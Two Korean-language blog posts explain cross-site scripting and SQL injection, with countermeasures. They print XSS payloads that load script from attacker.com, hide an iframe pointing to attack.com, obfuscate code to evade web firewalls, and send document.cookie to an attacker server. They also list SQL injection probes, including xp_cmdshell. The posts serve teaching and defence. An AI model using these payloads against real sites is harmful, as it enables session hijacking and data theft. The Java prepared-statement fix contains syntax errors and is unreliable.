<p>오늘날 대부분의 웹 사이트는 동적 컨텐트를 웹 페이지에 추가하여 사용자에게 더 많은 즐거움을 선사한다. 동적 컨텐트는 몇몇 서버
프로세스에서 만들어진 컨텐트로서, 설정과 필요에 따라 다르게 작동하고 디스플레이 된다. 동적 웹 사이트는 정적 웹 사이트에는 없는 위험성도
지니고 있다. 이를 "크로스 사이트 스크립팅(cross-site scripting) "이라고 한다. 일명 "XSS"라고도 알려져 있다. </p>
<p>"웹 페이지는 텍스트와 HTML 마크업으로 구성된다. 이들은 서버에 의해 만들어지고 클라이언트 브라우저에 의해 인터프리팅 된다. 정적
페이지만을 만들어 내는 웹 사이트는 브라우저 사용자가 이러한 페이지들을 인터프리팅하는 방식을 완전히 제어할 수 있다. 동적 페이지를 만들어 내는
웹 사이트는 클라이언트가 아웃풋을 인터프리팅 하는 방식을 완전히 제어하지는 못한다. 신뢰할 수 없는 컨텐트가 동적 웹 페이지에 들어갈 수 있다는
것이 문제의 본질이다. 웹 사이트나 클라이언트도 이러한 현상을 인식하여 방어할 수 있는 충분한 정보가 없다." 인터넷 보안 취약성을 연구하는
CERT Coordination Center의 설명이다. </p>
<p>크로스 사이트 스크립팅은 공격자들에게는 이미 유명해졌다. 매월 크로스 사이트 스크립팅 공격이 상용 사이트에서 발생하고 그러한 위험성을
설명하는 경고문이 발표된다. 주의하지 않는다면 여러분의 웹 사이트나 회사도 이러한 공격의 희생양이 될 것이다. <br>XSS (Cross Site Scripting) 크로스 사이트 스크립팅은 서버의 서비스를 공격하는 일반적인 해킹방법이 아니라 해당 서버를 사용하는 사용자를 공격하는 기법이다. 예를 들어 서비스를 사용하는 사용자가 글을 읽으려고 클릭하는 순간 글에 연결되어 있는 스크립트가 실행되고 스크립트를 통하여 사용자에게 악성코드가 심어진다.<br><br>글, 메일, 그림 등을 열람하기 위하여 사용자들의 흥미를 유발시키기 때문에 사회공학적 해킹기법으로 분류된다.<br><br>웹 사이트상의 애플리케이션이 크로스 사이트 스크립팅에 취약하다고 알려지면 공격자는 공격을 구상하게 된다. 공격자가 가장 빈번하게 사용하는 기술은
공격 목표의 시스템에 공격 목표의 권한을 사용하여 실행할 수 있도록 JavaScript, VBScript, ActiveX, HTML,
Flash를 투입하는 것이다. 공격이 활성화 되면 계정 하이재킹, 사용자 설정 변경, 쿠키 훔치기 및 오염, 오류 광고 등이 가능하다. <br><br><br><strong>1. XSS Test</strong><br><br>일반적인 게시판에 <script>alert("XSS")</script>라고 입력하여 XSS라는 메시지 창이 뜨면 XSS취약점이 있는 것이다.<br><br>예제1) 사용자의 쿠키값을 획득<br><script>alert(document.cookie);</script><br><br>예제2) 클릭 시 악성코드가 있는 사이트로 이동<br><a href="http://test.com/test.cgi?loc=<script src='http://attacker.com/test'></script>">Click</a><br><br><strong>2. iframe 태그</strong><br><br>예제1) 숨겨진 iframe를 이용해 악성코드 사이트로 이동<br><iframe src=" <a href="http://attack.com/"><font color="#ec5600">http://attack.com</font></a>" width="0" height="0" frameborder="0"></iframe><br><br><strong>3. object 태그</strong><br><br>예제1) 지정한 파일이 존재하지 않을 때 악성코드 사이트로 이동하도록 함.<br><object width=0 height=0 sytle=display:none; type=text/xscriptlet data=mk:@MSITStore:mhtml:c:\nosuchfile.mht! http://test.com/attack_chm::exploit.html></object><br><br><strong>4. div 기법<br></strong><br>예제1) div 태그를 사용하여 이미지 등을 삽입시킨다.<br><div style="position:absolute; left:200; top:90; z-index:2;"><br> <img src="images/test.jpg"><br></div><br><br><strong>5. 인코딩 기법<br></strong><br>예제1) 공격하려는 문자열을 다른 표현으로 인코딩하여 눈에 띠지 않거나, IPS, 웹방화벽 드의 감지패턴을 우회하기 위하여 인코딩한다.<br><br>원본 : <script>alert("test");</script><br>인코딩 : <script>alert(String.fromCharCode(116, 101, 115, 116))</script><br><br><strong>6. Obfuscated 기법<br></strong><br>예제1) 인코딩 기법과 같이 우회하기 위해 사용한다.<br><script language="javascript"><br> e = '0x00' + '5F';<br> str1 = "%E4%BC%B7%AA%C0%AD ....... %AA%E2";<br> str = tmp = '';<br><br> for(i=0; i<str1.length; i+=3)<br> { <br> tmp = unescape(str1.slice(i,i+3));<br> str = str + String.fromCharCode((tmp.charCodeAt(0)^e)-127);<br> }<br><br> document.write(str); <br></script><br><br><strong>7. 기타우회 방법</strong> <span style="color: rgb(153, 0, 0);">(이 방법은 정확히 이해가 안되네)<br></span><br>;</script><script>alert("xss");</scr..</p><p><a name="N1021F"><span class="atitle"><font size="4">요약</font></span></a></p><p>공격자들이 크로스 사이트 스크립팅을 사용하여 웹 사이트를 공격하는 방법을 설명했다. 또한 웹 사이트가 간단한 커스텀 태그 라이브러리를
사용하여 동적 컨텐트를 암호화 하는 것으로도 이러한 공격을 줄일 수 있다는 것을 설명했다. <code><font size="2">XSS</font></code> 커스텀 태그
라이브러리를 그대로 사용하거나 이를 변형하여 자신의 웹 애플리케이션에 맞출 수 있다. <br><br>관련 정보 : <a href="http://ha.ckers.org/xss.html#XSScalc">http://ha.ckers.org/xss.html#XSScalc</a></p><p><strong><a href="https://youngsam.net/entry/XSSCross-Site-Scripting-%ED%81%AC%EB%A1%9C%EC%8A%A4-%EC%82%AC%EC%9D%B4%ED%8A%B8-%EC%8A%A4%ED%81%AC%EB%A6%BD%ED%8C%85?commentInput=true#entry1543WriteComment">댓글 쓰기</a></strong></p>SQL 삽입 공격 - XSS공격openkrhttps://youngsam.net/entry/SQL-%EC%82%BD%EC%9E%85-%EA%B3%B5%EA%B2%A9-XSS%EA%B3%B5%EA%B2%A92011-09-14T01:33:34+09:002011-09-14T01:33:34+09:00<p>1. SQL 삽입 공격</p><p> 1-1) 웹 애플리케이션은 사용자로부터 SQL 구문을 입력 받는 부분, 즉 데이터베이스와 연동되어야</p><p> 연동되어야 하는 부분은 크게 로그인, 검색, 게시판으로 나눌 수 있습니다.</p><p> 1-2) 로그인 하는 과정에서 아이디와 패스워드 부분에 특정한 SQL 문이 사입되어 그것이 그대로 </p><p> 데이터베이스에 전송되어 공격자는 원하는 결과를 볼 수 있는 것입니다.</p><p> 1-3) 발전된 SQL 공격</p><p> 단순한 로그인 우회 공격이 아닌 다른 테이블에 있는 내용을 열람하는 공격</p><p> 일반적으로 우편번호 검색 부분에 SQL 쿼리를 입력 받아 조회를 하고 조회하는 과정에서</p><p> 사용자 입력을 체크하지 않을 경우 SQL Injection 취약점으로 인해 다른 테이블의 내용을 열람</p><p> 할 수도 있습니다. 또한 Union 구문을 이용하는 경우도 있습니다.</p><p> 1-4) 발전된 SQL Injection 공격을 위해 다음과 같은 조건이 만족되어야 합니다.</p><p> 앞의 select 문에서 가져온 열 수와 union뒤에 select 문에서 가져오는 열 수가 동일해야 하고</p><p> 테이블의 이름과 컬럼의 이름을 알고 있어야 하며 각 컬럼의 타입이 일치해야 합니다.</p><p> 1-5) SQL Injection 취약점이 존재하는지 확인 하는 방법</p><p> 1. 사용자의 입력이 DB와 연결되는 부분에 ' 과 같은 문자를 입력하였을 때 SQL 에러가 </p><p> 발생하면 SQL Injection 취약점이 존재한다고 봄</p><p> 2. SQL 이중 명령어의 사용 : MS-SQL의 경우 ; 문자가 존재하면 SQL 쿼리를 끝내고 ; 다음에</p><p> 나오는 SQL 쿼리를 실행합니다.</p><p> 3. MS-SQL의 경우 xp_cmdshell을 이용하여 윈도우 내부 명령어를 실행할 수 있습니다.</p><p> 1-6) 대응법</p><p> <font color="#ff0000">1. SQL Injection 공격 취약점은 프로그래머가 사용자의 입력을 받는 부분에서 비정상적인</font></p><p><font color="#ff0000"> 입력이나 예상치 못한 입력을 받는 것을 처리하지 못 할 때 발생합니다.</font></p><p><font color="#ff0000"> 2. SQL Injection 공격을 막기 위해서는 사용자의 입력 값에 대한 필터링을 수행합니다.</font></p><p><font color="#ff0000"> 3. CSS 언어에서의 검증이 아닌 SSS 의 검증으로 처리합니다.</font></p><p>해결안)</p><p> String param1 = request.getParameter("id");</p><p> String param2 = request.getParameter("password");</p><p><font color="#ff0000"> validata(param1); // 특수 문자에 대한 필터링</font></p><p><font color="#ff0000"> validata(param2);</font> </p><p> query = "select userid, userpw from users where userid =? ";</p><p> pstmt = conn.prepareStatement(query);</p><p> pstmt = setString1, param1);</p><p> rs = pstmt.executeQuery();</p><p> if (rs.next()) {</p><p> //검증 </p><p> if (<font color="#ff0000">rs.getString(1).equals(param1) && getString(2).equals(param2)) </font>{</p><p> //성공</p><p> }else {</p><p> //실패</p><p> }else {</p><p> // 로그인 실패</p><p> }</p><p>2. XSS 공격</p><p> 2-1) XSS를 이용한 공격의 기본 원리</p><p> <div class="imageblock center" style="text-align: center; clear: both;"><img src="https://youngsam.net/attach/1/1164614176.jpg" alt="사용자 삽입 이미지" height="386" width="550" /></div> </p><p> 2-2) XSS란</p><p> 1. Corss Site Scripting의 약자를 줄여 CSS라고 합니다. 또 다른 이름인 Cascadion Style</p><p> Sheets와 혼동되어 일반적으로 XSS라고 불리게 되었습니다.</p><p> 2. XSS는 타 사용자의 정보를 추출하기 위해 사용되는 공격 기법으로 게시판이나 검색 부분, </p><p> 즉 사용자의 입력을 받아들이는 부분에 스크립트 코드를 필터링하지 않음으로써 공격자가</p><p> 스크립트 코드를 실행할 수 있게 되는 취약점 입니다.</p><p> 2-3) XSS를 통한 공격 방법</p><p> 실제 XSS 공격을 통해 다른 사용자의 쿠키 값을 이용해 다른 사용자로 로그인 하는 과정</p><p> 1. 게시판에 특정 스크립트를 작성한 뒤 불특정 다수가 보도록 유도합니다.</p><p> 2. 스크립트가 시작하여 열람자의 쿠키 값을 가로챔니다.</p><p> 3. 가로챈 쿠키 값을 웹 포록시 등을 이용하여 재전송합니다.</p><p> 4. 공격자는 열람자의 정보로 로그인을 합니다.</p><p> 예) <script> url="http://192.0.0.1/GetCookie.jsp?cookie=+document.cookie;whidow.open(</p><p> url,width=0, height=0);</script></p><p> 위 코드는 게시판을 열람시에 사용자의 쿠키 정보가 해커의 웹서버로 전송하는 코드임</p><p><div class="imageblock center" style="text-align: center; clear: both;"><img src="https://youngsam.net/attach/1/1229687238.jpg" alt="사용자 삽입 이미지" height="91" width="550" /></div></p><p> 2-4) 대응방안</p><p> 1. 중요한 정보는 쿠키에 저장하지 않아야 하며 사용자 식별 같은 부분은 쿠키에 담지 <br> 않아야</p><p> 한다.</p><p> 2. 스크립트 코드에 사용되는 특수 문자에 대한 이해와 정확한 필터링을 해야 한다. <br>가장 효과적인 방법은 사용자가 입력 가능한 문자(예를 들어, 알파벳, 숫자 및 몇 개의 특수문자)</p><p> 만을 정해 놓고 그 문자열이 아닌 경우는 모두 필터링해야 합니다. 이 방법은 추가적인</p><p> XSS 취약점에 사용되는 특수 문자를 애초부터 막을 수 있다는 장점이 있습니다.</p><p> 3. 꼭 필요한 경우가 아니라면 게시판에 HTML 포멧의 입력을 사용할 수 없도록 설정합니다.</p><p> 4. 스크립트 대체 및 무효화 javascript라고 들어오는 문자열을 무조건 'x-javascript'와 </p><p> 같이 대체를 하여 스크립트 실행을 무효화시키는 방법도 있습니다.</p><p> 5. 정기적인 점검을 통해 취약점을 수시로 확인하고 제거합니다. </p><p><strong><a href="https://youngsam.net/entry/SQL-%EC%82%BD%EC%9E%85-%EA%B3%B5%EA%B2%A9-XSS%EA%B3%B5%EA%B2%A9?commentInput=true#entry1542WriteComment">댓글 쓰기</a></strong></p>